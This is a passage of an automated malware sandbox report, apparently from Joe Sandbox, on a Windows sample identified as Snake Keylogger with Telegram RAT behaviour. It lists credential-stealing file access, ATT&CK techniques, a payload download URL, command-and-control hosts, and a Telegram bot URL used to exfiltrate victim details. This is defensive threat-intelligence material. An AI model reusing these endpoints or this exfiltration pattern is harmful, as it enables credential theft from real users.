            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000007.00000002.2695880589.0000000022EE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 8168, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 8168, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		3
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            PowerShell            		Boot or Logon Initialization Scripts1
            Access Token Manipulation            		2
            Obfuscated Files or Information            		LSASS Memory116
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)111
            Process Injection            		1
            Software Packing            		Security Account Manager1
            Query Registry            		SMB/Windows Admin Shares1
            Email Collection            		11
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS211
            Security Software Discovery            		Distributed Component Object Model1
            Clipboard Data            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading            		LSA Secrets1
            Process Discovery            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
            Virtualization/Sandbox Evasion            		Cached Domain Credentials41
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
            Process Injection            		Proc Filesystem1
            System Network Configuration Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518332 Sample: file.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 27 reallyfreegeoip.org 2->27 29 api.telegram.org 2->29 31 2 other IPs or domains 2->31 43 Found malware configuration 2->43 45 Antivirus detection for URL or domain 2->45 47 Multi AV Scanner detection for dropped file 2->47 53 6 other signatures 2->53 8 file.exe 1 29 2->8         started        signatures3 49 Tries to detect the country of the analysis system (by using the IP) 27->49 51 Uses the Telegram API (likely for C&C communication) 29->51 process4 file5 21 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->21 dropped 11 powershell.exe 20 8->11         started        process6 file7 23 C:\Users\user\AppData\Local\...\file.exe, PE32 11->23 dropped 25 C:\Users\user\...\file.exe:Zone.Identifier, ASCII 11->25 dropped 55 Writes to foreign memory regions 11->55 57 Found suspicious powershell code related to unpacking or dynamic code loading 11->57 59 Powershell drops PE file 11->59 15 wabmig.exe 15 8 11->15         started        19 conhost.exe 11->19         started        signatures8 process9 dnsIp10 33 api.telegram.org 149.154.167.220, 443, 49730 TELEGRAMRU United Kingdom 15->33 35 reallyfreegeoip.org 188.114.97.3, 443, 49713, 49715 CLOUDFLARENETUS European Union 15->35 37 2 other IPs or domains 15->37 39 Tries to steal Mail credentials (via file / registry access) 15->39 41 Tries to harvest and steal browser information (history, passwords, etc) 15->41 signatures11

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            file.exe21%ReversingLabsWin32.Trojan.Generic

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll0%ReversingLabs
            C:\Users\user\AppData\Local\acneform\Tjenestepligterne\file.exe21%ReversingLabsWin32.Trojan.Generic

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            http://varders.kozow.com:80810%URL Reputationsafe
            http://aborters.duckdns.org:8081100%URL Reputationmalware
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            http://anotherarmy.dns.army:8081100%URL Reputationmalware
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
            https://www.office.com/lB0%Avira URL Cloudsafe
            https://api.telegram.org0%Avira URL Cloudsafe
            https://api.telegram.org/bot0%Avira URL Cloudsafe
            https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://www.office.com/0%Avira URL Cloudsafe
            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:093954%0D%0ADate%20a0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
            https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/8.46.123.33$0%Avira URL Cloudsafe
            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:093954%0D%0ADate%20and%20Time:%2025/09/2024%20/%2022:55:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20093954%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
            https://chrome.google.com/webstore?hl=enlB0%Avira URL Cloudsafe
            http://crl.microsoft0Wq0%Avira URL Cloudsafe
            http://185.29.11.53/fhSIfglR68.bin0%Avira URL Cloudsafe
            http://185.29.11.53/fhSIfglR68.bin;0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            reallyfreegeoip.org
            		188.114.97.3
            		truetrue
              		unknown
              api.telegram.org
              		149.154.167.220
              		truetrue
                		unknown
                checkip.dyndns.com
                		132.226.247.73
                		truefalse
                  		unknown
                  checkip.dyndns.org
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://reallyfreegeoip.org/xml/8.46.123.33false
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:093954%0D%0ADate%20and%20Time:%2025/09/2024%20/%2022:55:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20093954%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://checkip.dyndns.org/false
                    • URL Reputation: safe
                    		unknown
                    http://185.29.11.53/fhSIfglR68.binfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.office.com/wabmig.exe, 00000007.00000002.2695880589.0000000022FCD000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/chrome_newtabwabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.telegram.orgwabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icowabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2207916280.0000000004EE5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.telegram.org/botwabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:093954%0D%0ADate%20awabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2207916280.0000000004EE5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.office.com/lBwabmig.exe, 00000007.00000002.2695880589.0000000022FC8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://checkip.dyndns.orgwabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://nsis.sf.net/NSIS_ErrorErrorfile.exe, file.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://chrome.google.com/webstore?hl=enwabmig.exe, 00000007.00000002.2695880589.0000000022F9C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ecosia.org/newtab/wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://varders.kozow.com:8081wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2207916280.0000000004EE5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://aborters.duckdns.org:8081wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2207916280.0000000004D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://reallyfreegeoip.org/xml/8.46.123.33$wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E55000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://anotherarmy.dns.army:8081wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://chrome.google.com/webstore?hl=enlBwabmig.exe, 00000007.00000002.2695880589.0000000022F97000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://reallyfreegeoip.orgwabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E2A000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2207916280.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.microsoft0Wqpowershell.exe, 00000002.00000002.2212699188.00000000074A0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://185.29.11.53/fhSIfglR68.bin;wabmig.exe, 00000007.00000002.2683738778.0000000007843000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://reallyfreegeoip.org/xml/wabmig.exe, 00000007.00000002.2695880589.0000000022E2A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    149.154.167.220
                    		api.telegram.orgUnited Kingdom
                    		62041TELEGRAMRUtrue
                    188.114.97.3
                    		reallyfreegeoip.orgEuropean Union
                    		13335CLOUDFLARENETUStrue
                    185.29.11.53
                    		unknownEuropean Union
                    		203557DATACLUB-NLfalse
                    132.226.247.73
                    		checkip.dyndns.comUnited States
                    		16989UTMEMUSfalse

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1518332
                    Start date and time:2024-09-25 15:59:09 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 28s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@6/12@3/4
                    EGA Information:
                    • Successful, ratio: 66.7%
                    HCA Information:
                    • Successful, ratio: 96%
                    • Number of executed functions: 157
                    • Number of non-executed functions: 45
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 7496 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: file.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    10:00:08API Interceptor31x Sleep call for process: powershell.exe modified
                    10:01:29API Interceptor416x Sleep call for process: wabmig.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    149.154.167.220z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                        Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                          test.batGet hashmaliciousMicroClipBrowse
                            rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                  Or3dzp4vB1.exeGet hashmaliciousXWormBrowse
                                    z9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      rdoc17000320240923070456.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                        188.114.97.3PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                        • www.rtprajalojago.live/2wnz/
                                        (PO403810)_VOLEX_doc.exeGet hashmaliciousLokibotBrowse
                                        • dddotx.shop/Mine/PWS/fre.php
                                        QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • filetransfer.io/data-package/DiF66Hbf/download
                                        http://easyantrim.pages.dev/id.htmlGet hashmaliciousHTMLPhisherBrowse
                                        • easyantrim.pages.dev/id.html
                                        QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • filetransfer.io/data-package/13rSMZZi/download
                                        Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                        • www.rtpngk.xyz/yhsl/
                                        PO-001.exeGet hashmaliciousFormBookBrowse
                                        • www.x0x9x8x8x7x6.shop/assb/
                                        PO2024033194.exeGet hashmaliciousFormBookBrowse
                                        • www.cc101.pro/4hfb/
                                        ADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
                                        • www.chinaen.org/zi4g/
                                        updater.exeGet hashmaliciousUnknownBrowse
                                        • microsoft-rage.world/Api/v3

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        reallyfreegeoip.orgz84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                        • 188.114.96.3
                                        cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                        • 188.114.97.3
                                        rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        rPROFORMAINVOICE-PO_ATS_1036pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                        • 188.114.97.3
                                        rShippingDocuments_Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        checkip.dyndns.comz84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.130.0
                                        rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                        • 132.226.247.73
                                        cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 132.226.247.73
                                        Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 132.226.247.73
                                        FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                        • 193.122.6.168
                                        rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.6.168
                                        rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.8.169
                                        rPROFORMAINVOICE-PO_ATS_1036pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 132.226.8.169
                                        rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                        • 193.122.6.168
                                        rShippingDocuments_Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 132.226.247.73
                                        api.telegram.orgz84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                        • 149.154.167.220
                                        Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 149.154.167.220
                                        test.batGet hashmaliciousMicroClipBrowse
                                        • 149.154.167.220
                                        rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                        • 149.154.167.220
                                        Or3dzp4vB1.exeGet hashmaliciousXWormBrowse
                                        • 149.154.167.220
                                        z9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        rdoc17000320240923070456.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        TELEGRAMRUz84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                        • 149.154.167.220
                                        Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 149.154.167.220
                                        test.batGet hashmaliciousMicroClipBrowse
                                        • 149.154.167.220
                                        rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                        • 149.154.167.220
                                        Or3dzp4vB1.exeGet hashmaliciousXWormBrowse
                                        • 149.154.167.220
                                        z9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        rdoc17000320240923070456.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        CLOUDFLARENETUSShipping documents 000022999878999800009999.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 104.26.13.205
                                        EFT Remittance - 25_09_24 Ref_3c70ac202caa933179b3568afa512866a7bd5171.emlGet hashmaliciousUnknownBrowse
                                        • 104.17.25.14
                                        z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                        • 188.114.96.3
                                        cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        update.ps1Get hashmaliciousNetSupport RAT, HTMLPhisherBrowse
                                        • 104.21.73.126
                                        https://1drv.ms/o/s!AnrtiNmLLRZglVBmj_pzjvzIvHZ7?e=WnZeS1Get hashmaliciousHtmlDropperBrowse
                                        • 104.18.94.41
                                        hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                        • 188.114.97.3
                                        1e#U0414.exeGet hashmaliciousLokibotBrowse
                                        • 188.114.96.3
                                        wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                        • 188.114.96.3
                                        DATACLUB-NLShipping documents 000022999878999800009999.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 185.29.11.53
                                        Ze1Ueabtx5.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 185.29.11.53
                                        Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 185.29.11.53
                                        PO 00009876660887666000.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 84.38.133.121
                                        Bankcopyscanneddoc.exeGet hashmaliciousRedLineBrowse
                                        • 84.38.129.21
